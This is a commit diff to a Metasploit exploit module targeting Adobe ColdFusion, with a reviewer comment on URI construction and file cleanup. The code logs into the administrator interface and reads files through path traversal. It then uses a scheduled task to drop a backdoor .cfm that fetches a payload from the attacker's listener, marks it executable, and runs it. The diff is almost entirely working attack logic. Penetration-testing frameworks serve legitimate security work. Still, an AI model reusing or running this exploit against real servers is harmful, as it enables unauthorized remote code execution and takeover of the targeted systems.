Addressed feedback from PR#1717

bug/bundler_fix
Jon Hart 2013-04-16 19:00:26 -07:00
parent 0d2746fb4c
commit 83ec9757ec
1 changed files with 16 additions and 51 deletions


@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -97,6 +98,10 @@ class Metasploit3 < Msf::Exploit::Remote
# login # login
cf_cookies = login cf_cookies = login
# relative to where we operate during the exploit,
# where is the CFIDE directory?
@cf_root = "../../wwwroot/CFIDE/"
# if we managed to login, get the listener ready # if we managed to login, get the listener ready
datastore['URIPATH'] = rand_text_alphanumeric(6) datastore['URIPATH'] = rand_text_alphanumeric(6)
if (datastore['SRVHOST'] == "0.0.0.0") if (datastore['SRVHOST'] == "0.0.0.0")
@ -113,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote
# which technique (cmd, payload) the user wants # which technique (cmd, payload) the user wants
input_exec = srv_uri + "/#{datastore['URIPATH']}-e" input_exec = srv_uri + "/#{datastore['URIPATH']}-e"
output_exec = "#{datastore['URIPATH']}-e.cfm" output_exec = "#{datastore['URIPATH']}-e.cfm"
register_file_for_cleanup @cf_root + output_exec
schedule_drop cf_cookies, input_exec, output_exec schedule_drop cf_cookies, input_exec, output_exec
if datastore['CMD'] and not datastore['CMD'].empty? if datastore['CMD'] and not datastore['CMD'].empty?
# now that the coldfusion exec is on disk, execute it, # now that the coldfusion exec is on disk, execute it,
# passing in the command and arguments # passing in the command and arguments
@ -124,35 +129,21 @@ class Metasploit3 < Msf::Exploit::Remote
else else
# drop the payload # drop the payload
input_payload = srv_uri + "/#{datastore['URIPATH']}-p" input_payload = srv_uri + "/#{datastore['URIPATH']}-p"
output_payload = "#{datastore['URIPATH']}-p" output_payload = "#{datastore['URIPATH']}-p.bat"
register_file_for_cleanup @cf_root + output_payload
schedule_drop cf_cookies, input_payload, output_payload schedule_drop cf_cookies, input_payload, output_payload
# make the payload executable # make the payload executable
# XXX: windows? # XXX: windows?
execute output_exec, 'chmod', "755 ../../wwwroot/CFIDE/#{output_payload}" execute output_exec, 'chmod', "755 #{@cf_root}#{output_payload}"
# execute the payload # execute the payload
execute output_exec, "../../wwwroot/CFIDE/#{output_payload}" execute output_exec, "#{@cf_root}#{output_payload}"
end end
handler handler
end end
def execute(cfm=nil, cmd=nil, args='') def execute(cfm=nil, cmd=nil, args='')
uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}" uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}"
send_request_raw( { 'uri' => uri, 'method' => 'GET' }, 25 ) send_request_cgi( { 'uri' => uri, 'method' => 'GET' }, 25 )
end
def on_new_session(client)
return
# TODO: cleanup
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
@files.each do |file|
client.fs.file.rm("#{file}")
end
else
@files.each do |file|
client.shell_command_token("rm #{file}")
end
end
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
@ -179,30 +170,6 @@ class Metasploit3 < Msf::Exploit::Remote
cookies.to_a.map { |a| a.join '=' }.join '; ' cookies.to_a.map { |a| a.join '=' }.join '; '
end end
# this doesn't actually work
def twiddle_csrf(cookies=nil, enable=false)
mode = (enable ? "Enabling" : "Disabling")
print_status "#{mode} CSRF protection"
params = {
'SessEnable' => enable.to_s,
}
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "/CFIDE/administrator/settings/memoryvariables.cfm"),
'method' => 'POST',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookies),
'vars_post' => params,
})
if res
if res.body =~ /SessionManagement should/
print_error "Error #{mode} CSRF"
end
else
print_error "No response while #{mode} CSRF"
end
end
# Using the provided +cookies+, schedule a ColdFusion task # Using the provided +cookies+, schedule a ColdFusion task
# to request content from +input_uri+ and drop it in +output_path+ # to request content from +input_uri+ and drop it in +output_path+
def schedule_drop(cookies, input_uri, output_path) def schedule_drop(cookies, input_uri, output_path)
@ -227,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
unless token unless token
print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)" print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)"
#twiddle_csrf cookies, false
token = '' token = ''
end end
else else
@ -250,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote
# pick a unique task ID # pick a unique task ID
task_id = SecureRandom.uuid task_id = SecureRandom.uuid
# drop the backdoor in the CFIDE directory so it can be executed # drop the backdoor in the CFIDE directory so it can be executed
publish_file = '../../wwwroot/CFIDE/' + output_path publish_file = "#{@cf_root}#{output_path}"
# pick a start date. This must be in the future, so pick # pick a start date. This must be in the future, so pick
# one sufficiently far ahead to account for time zones, # one sufficiently far ahead to account for time zones,
# improper time keeping, solar flares, drift, etc. # improper time keeping, solar flares, drift, etc.
@ -302,7 +268,6 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'uri' => normalize_uri(target_uri.path, scheduleedit_path), 'uri' => normalize_uri(target_uri.path, scheduleedit_path),
'method' => 'POST', 'method' => 'POST',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
'vars_post' => params, 'vars_post' => params,
}) })
@ -328,18 +293,15 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server", 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server",
'method' => 'GET', 'method' => 'GET',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
}) })
#twiddle_csrf cookies, true
if datastore['DELETE_TASK'] if datastore['DELETE_TASK']
print_status "Removing task #{task_id}" print_status "Removing task #{task_id}"
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}", 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}",
'method' => 'GET', 'method' => 'GET',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
}) })
end end
@ -397,7 +359,6 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)), 'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)),
'method' => 'POST', 'method' => 'POST',
'connection' => 'TE, close',
'vars_post' => { 'vars_post' => {
'method' => 'login', 'method' => 'login',
'adminUserId' => user, 'adminUserId' => user,
@ -620,6 +581,8 @@ class Metasploit3 < Msf::Exploit::Remote
false false
end end
# Read the file located at +path+ using the provided ColdFusion +cookies+,
# returning the contents of the file if found, an empty string otherwise
def traverse_read(path, cookies) def traverse_read(path, cookies)
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path="
@ -633,6 +596,8 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.body if res and res.body
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
else
return ""
end end
end end
end end
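Review bot: In the hunk at `@ -124,35 +129,21`, `execute` still builds its path as `"/CFIDE/" + cfm + "?cmd=#{cmd}&args=…"`, so it ignores `TARGETURI` while every other request in this file goes through `normalize_uri(target_uri.path, …)`, and `cmd` is interpolated without the `uri_encode` that `args` receives; switching from `send_request_raw` to `send_request_cgi` does not change either point. I would write `uri = normalize_uri(target_uri.path, 'CFIDE', cfm)` and move the query into `'vars_get' => { 'cmd' => cmd, 'args' => args }`, which also removes the hand-rolled encoding. The `cfm=nil` default cannot actually be exercised, because `"/CFIDE/" + nil` raises `TypeError`, so either drop the default or guard it with an early return. Separately, `register_file_for_cleanup @cf_root + output_exec` (and the matching line for `output_payload`) registers a path that is relative to the scheduler's working directory, whereas FileDropper removes files through the session, whose working directory may differ, so the dropped `.cfm` may survive cleanup; if an absolute path cannot be determined, a comment stating that cleanup depends on the session's cwd would at least make the limitation visible.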